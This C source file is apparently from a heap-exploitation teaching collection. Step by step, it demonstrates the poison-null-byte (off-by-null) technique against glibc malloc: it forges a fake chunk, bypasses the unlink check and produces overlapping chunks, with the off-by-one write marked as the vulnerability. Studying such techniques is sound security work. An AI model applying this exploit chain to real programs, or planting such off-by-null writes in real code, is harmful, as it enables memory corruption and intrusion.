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poison_null_byte.c
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poison_null_byte.c
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#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>
int main()
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);
puts("Welcome to poison null byte!");
puts("Tested in Ubuntu 20.04 64bit.");
puts("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.");
puts("Some of the implementation details are borrowed from https://github.com/StarCross-Tech/heap_exploit_2.31/blob/master/off_by_null.c\n");
// step1: allocate padding
puts("Step1: allocate a large padding so that the fake chunk's addresses's lowest 2nd byte is \\x00");
void *tmp = malloc(0x1);
void *heap_base = (void *)((long)tmp & (~0xfff));
printf("heap address: %p\n", heap_base);
size_t size = 0x10000 - ((long)tmp&0xffff) - 0x20;
printf("Calculate padding chunk size: 0x%lx\n", size);
puts("Allocate the padding. This is required to avoid a 4-bit bruteforce because we are going to overwrite least significant two bytes.");
void *padding= malloc(size);
// step2: allocate prev chunk and victim chunk
puts("\nStep2: allocate two chunks adjacent to each other.");
puts("Let's call the first one 'prev' and the second one 'victim'.");
void *prev = malloc(0x500);
void *victim = malloc(0x4f0);
puts("malloc(0x10) to avoid consolidation");
malloc(0x10);
printf("prev chunk: malloc(0x500) = %p\n", prev);
printf("victim chunk: malloc(0x4f0) = %p\n", victim);
// step3: link prev into largebin
puts("\nStep3: Link prev into largebin");
puts("This step is necessary for us to forge a fake chunk later");
puts("The fd_nextsize of prev and bk_nextsize of prev will be the fd and bck pointers of the fake chunk");
puts("allocate a chunk 'a' with size a little bit smaller than prev's");
void *a = malloc(0x4f0);
printf("a: malloc(0x4f0) = %p\n", a);
puts("malloc(0x10) to avoid consolidation");
malloc(0x10);
puts("allocate a chunk 'b' with size a little bit larger than prev's");
void *b = malloc(0x510);
printf("b: malloc(0x510) = %p\n", b);
puts("malloc(0x10) to avoid consolidation");
malloc(0x10);
puts("\nCurrent Heap Layout\n"
" ... ...\n"
"padding\n"
" prev Chunk(addr=0x??0010, size=0x510)\n"
" victim Chunk(addr=0x??0520, size=0x500)\n"
" barrier Chunk(addr=0x??0a20, size=0x20)\n"
" a Chunk(addr=0x??0a40, size=0x500)\n"
" barrier Chunk(addr=0x??0f40, size=0x20)\n"
" b Chunk(addr=0x??0f60, size=0x520)\n"
" barrier Chunk(addr=0x??1480, size=0x20)\n");
puts("Now free a, b, prev");
free(a);
free(b);
free(prev);
puts("current unsorted_bin: header <-> [prev, size=0x510] <-> [b, size=0x520] <-> [a, size=0x500]\n");
puts("Allocate a huge chunk to enable sorting");
malloc(0x1000);
puts("current large_bin: header <-> [b, size=0x520] <-> [prev, size=0x510] <-> [a, size=0x500]\n");
puts("This will add a, b and prev to largebin\nNow prev is in largebin");
printf("The fd_nextsize of prev points to a: %p\n", ((void **)prev)[2]+0x10);
printf("The bk_nextsize of prev points to b: %p\n", ((void **)prev)[3]+0x10);
// step4: allocate prev again to construct fake chunk
puts("\nStep4: Allocate prev again to construct the fake chunk");
puts("Since large chunk is sorted by size and a's size is smaller than prev's,");
puts("we can allocate 0x500 as before to take prev out");
void *prev2 = malloc(0x500);
printf("prev2: malloc(0x500) = %p\n", prev2);
puts("Now prev2 == prev, prev2->fd == prev2->fd_nextsize == a, and prev2->bk == prev2->bk_nextsize == b");
assert(prev == prev2);
puts("The fake chunk is contained in prev and the size is smaller than prev's size by 0x10");
puts("So set its size to 0x501 (0x510-0x10 | flag)");
((long *)prev)[1] = 0x501;
puts("And set its prev_size(next_chunk) to 0x500 to bypass the size==prev_size(next_chunk) check");
*(long *)(prev + 0x500) = 0x500;
printf("The fake chunk should be at: %p\n", prev + 0x10);
puts("use prev's fd_nextsize & bk_nextsize as fake_chunk's fd & bk");
puts("Now we have fake_chunk->fd == a and fake_chunk->bk == b");
// step5: bypass unlinking
puts("\nStep5: Manipulate residual pointers to bypass unlinking later.");
puts("Take b out first by allocating 0x510");
void *b2 = malloc(0x510);
printf("Because of the residual pointers in b, b->fd points to a right now: %p\n", ((void **)b2)[0]+0x10);
printf("We can overwrite the least significant two bytes to make it our fake chunk.\n"
"If the lowest 2nd byte is not \\x00, we need to guess what to write now\n");
((char*)b2)[0] = '\x10';
((char*)b2)[1] = '\x00'; // b->fd <- fake_chunk
printf("After the overwrite, b->fd is: %p, which is the chunk pointer to our fake chunk\n", ((void **)b2)[0]);
puts("To do the same to a, we can move it to unsorted bin first"
"by taking it out from largebin and free it into unsortedbin");
void *a2 = malloc(0x4f0);
free(a2);
puts("Now free victim into unsortedbin so that a->bck points to victim");
free(victim);
printf("a->bck: %p, victim: %p\n", ((void **)a)[1], victim);
puts("Again, we take a out and overwrite a->bck to fake chunk");
void *a3 = malloc(0x4f0);
((char*)a3)[8] = '\x10';
((char*)a3)[9] = '\x00';
printf("After the overwrite, a->bck is: %p, which is the chunk pointer to our fake chunk\n", ((void **)a3)[1]);
// pass unlink_chunk in malloc.c:
// mchunkptr fd = p->fd;
// mchunkptr bk = p->bk;
// if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
// malloc_printerr ("corrupted double-linked list");
puts("And we have:\n"
"fake_chunk->fd->bk == a->bk == fake_chunk\n"
"fake_chunk->bk->fd == b->fd == fake_chunk\n"
);
// step6: add fake chunk into unsorted bin by off-by-null
puts("\nStep6: Use backward consolidation to add fake chunk into unsortedbin");
puts("Take victim out from unsortedbin");
void *victim2 = malloc(0x4f0);
printf("%p\n", victim2);
puts("off-by-null into the size of vicim");
/* VULNERABILITY */
((char *)victim2)[-8] = '\x00';
/* VULNERABILITY */
puts("Now if we free victim, libc will think the fake chunk is a free chunk above victim\n"
"It will try to backward consolidate victim with our fake chunk by unlinking the fake chunk then\n"
"add the merged chunk into unsortedbin."
);
printf("For our fake chunk, because of what we did in step4,\n"
"now P->fd->bk(%p) == P(%p), P->bk->fd(%p) == P(%p)\n"
"so the unlink will succeed\n", ((void **)a3)[1], prev, ((void **)b2)[0], prev);
free(victim);
puts("After freeing the victim, the new merged chunk is added to unsorted bin"
"And it is overlapped with the prev chunk");
// step7: validate the chunk overlapping
puts("Now let's validate the chunk overlapping");
void *merged = malloc(0x100);
printf("merged: malloc(0x100) = %p\n", merged);
memset(merged, 'A', 0x80);
printf("Now merged's content: %s\n", (char *)merged);
puts("Overwrite prev's content");
memset(prev2, 'C', 0x80);
printf("merged's content has changed to: %s\n", (char *)merged);
assert(strstr(merged, "CCCCCCCCC"));
}